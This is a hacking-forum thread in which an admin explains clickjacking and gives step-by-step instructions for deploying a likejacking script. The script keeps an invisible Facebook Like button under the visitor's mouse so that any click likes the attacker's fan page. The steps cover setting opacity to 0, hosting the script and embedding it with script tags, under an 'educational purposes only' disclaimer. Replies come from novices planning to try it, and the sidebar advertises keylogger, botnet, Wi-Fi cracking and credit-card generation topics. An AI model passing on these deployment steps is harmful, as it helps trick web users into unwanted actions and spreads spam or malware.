Ethical Experts
Ethical Experts
Ethical Experts
Would you like to react to this message? Create an account in a few clicks or log in to continue.
Ethical Experts

A Community Dedicated to Helping and Learning . Here You Will Get Hacking Tutorials and Monetizing Methods . We Hope You Have a Pleasant Stay

HomeHome  SearchSearch  Latest imagesLatest images  RegisterRegister  Log in  
Still Currently working on the forum design, until I find a perfect design that can sit there for the whole life :p .. Please Bare with us if you see the design change while / after you refresh a page or return ! Sorry for the Inconvenience ~!
Search

Display results as :

Rechercher Advanced Search
Latest topics
» Hack Pack : Largest Hacking Tools Collection
Hacking Facebook Accounts By Clickjacking EmptyTue Apr 28, 2015 9:35 am by THE-OUTSIDER

» Hi everyone!
Hacking Facebook Accounts By Clickjacking EmptyFri Nov 07, 2014 11:24 pm by zekrum

» Hacking Email ID's
Hacking Facebook Accounts By Clickjacking EmptyThu Sep 25, 2014 7:22 pm by NAVEEN KUMAR . S

» entering in a computer binary
Hacking Facebook Accounts By Clickjacking EmptySat Sep 20, 2014 1:29 pm by erosh23

» hi hackers
Hacking Facebook Accounts By Clickjacking EmptySat Sep 20, 2014 1:26 pm by erosh23

» Introduce Yourself !
Hacking Facebook Accounts By Clickjacking EmptySat Sep 20, 2014 1:23 pm by erosh23

» Hello guys
Hacking Facebook Accounts By Clickjacking EmptyWed Jul 30, 2014 10:52 pm by RZero67

» need botnet like zues Betabot or any good botnet files please admin help me
Hacking Facebook Accounts By Clickjacking EmptyFri Jul 25, 2014 9:44 pm by sire_roktiv

» Extension Spoofer v0.1 [Beta Release]
Hacking Facebook Accounts By Clickjacking EmptyFri Jul 11, 2014 9:33 am by The Joker

Most Viewed Topics
Hack Pack : Largest Hacking Tools Collection
HACK WIFI PASSWORD USING CMD WHEN YOU ARE CONNECTED WITH WIFI
Hack Your BroadBand !! RISK FREE !!
Hacking With Keyloggers Prorat
How to Hack the Windows Admin Password Using OphCrack in Backtrack tutorial
How to Get Unlimited time in an Internet Cafe ... :D
How to Hack Websites & Servers - Tutorial
Cracking a WPA/WPA-2 Password.. ;)
Backtrack and Facebook
Credit Card Generating Sequence
Keywords
hack LARGEST wifi netcat
Facebook Like
Similar topics

Hacking Facebook Accounts By Clickjacking

Go down 
3 posters
AuthorMessage
The Joker
Admin
Admin
The Joker

Hacking Facebook Accounts By Clickjacking Empty
PostSubject: Hacking Facebook Accounts By Clickjacking   Hacking Facebook Accounts By Clickjacking EmptyThu Feb 07, 2013 10:26 pm

What is Clickjacking?

Clickjacking is a technique used by hackers or spammers to trick or cheat the users into clicking on links or buttons that are hidden from normal view (usually links color is same as page background). Clickjacking is possible because of a security weakness in web browsers that allows web pages to be layered and hidden from general view. In this situation what happens is that You think that you are clicking on a standard button or link, like the PLAY button or download button on an video or some stuff, but you are really clicking on a hidden link. Since you can’t see the clickjacker’s hidden link, you have no idea what you’re really doing. You could be downloading malware or making all your Facebook information public without realizing it. Some good hackers make ajax keyloggers and put them as javascripts over their fake websites and when you open them they retrieve all your passwords stored in web browser and records whatever you type while the web browser is open and stores this information on their servers.

There are several types of clickjacking but the most common is to hide a LIKE button under a dummy or fake button. This technique is called Likejacking. A scammer or hacker might trick you by saying that you like a product you’ve never heard. At first glance, likejacking sounds more annoying than harmful, but that’s not always true. If you’re scammed for liking Mark Zuckerberg​, the world isn’t likely to end. But you may be helping to spread spam or possibly sending Friends somewhere that contains malware.

How does It Work ?

The like button is made hidden and it moves along with the mouse.So, wherever the user clicks, the like button is clicked and your fan page is liked. First download the JavaScript from the below download link.

Download It From Here

After downloading the script extract all the files.Now modify the config.js and follow the below instructions.

1. Modify config.js file in "src" folder to change fan page URL and other things.
Comments are provided beside them to help you what they do exactly.

2. There is a time out function after which the like button will not be present(move) anymore.
"time" if set to 0 will make it stay forever(which is usually not preferred).

3. Set opacity to '0' before you run the script. Otherwise the like button will not be invisible
Properly set the var in the file if it is jumbled ?
After modifying the config.js script upload these scripts to javascript hosting website.I prefer yourjavascript you can also upload to some other website.

How To Run The Script ?

1. Add config.js just above head tag in your pages
----------------------------------------------------------------------------------------------------------------
<script language="javascript" src="src/config.js"> </script>
----------------------------------------------------------------------------------------------------------------

2. Add like.js after body tag in your pages
<script language="javascript" src="src/like.js"> </script>

Remove src link with your uploaded link.

5. That's it. The script is ready to go.

I am very soon going to make the Video tutorial. I apologize for not being able to upload or make any new videos. i have been quite busy lately. but i promise to make up for it , very soon, once i get my Exam Results. Thanks for being patient

NOTE: THIS POST IS FOR EDUCATIONAL PURPOSES ONLY ANY MISUSE OF THE CONTENTS OF THIS POST, THE ADMIN OR TEAMIHA WILL NOT BE HELD RESPONSIBLE FOR YOUR ACTIONS.
Back to top Go down
http://teamiha.tumblr.com
muchacha00
n00b

PostSubject: Re: Hacking Facebook Accounts By Clickjacking   Hacking Facebook Accounts By Clickjacking EmptySat May 11, 2013 1:12 am

hope you can make a video sir
Back to top Go down
raju
n00b
raju

PostSubject: Re: Hacking Facebook Accounts By Clickjacking   Hacking Facebook Accounts By Clickjacking EmptyThu Oct 17, 2013 4:00 am

sir,i dont know anything about how to hack :-( but,i like your post sir! i will definitely try it!..
Back to top Go down
Sponsored content

PostSubject: Re: Hacking Facebook Accounts By Clickjacking   Hacking Facebook Accounts By Clickjacking Empty

Back to top Go down

Hacking Facebook Accounts By Clickjacking
Page 1 of 1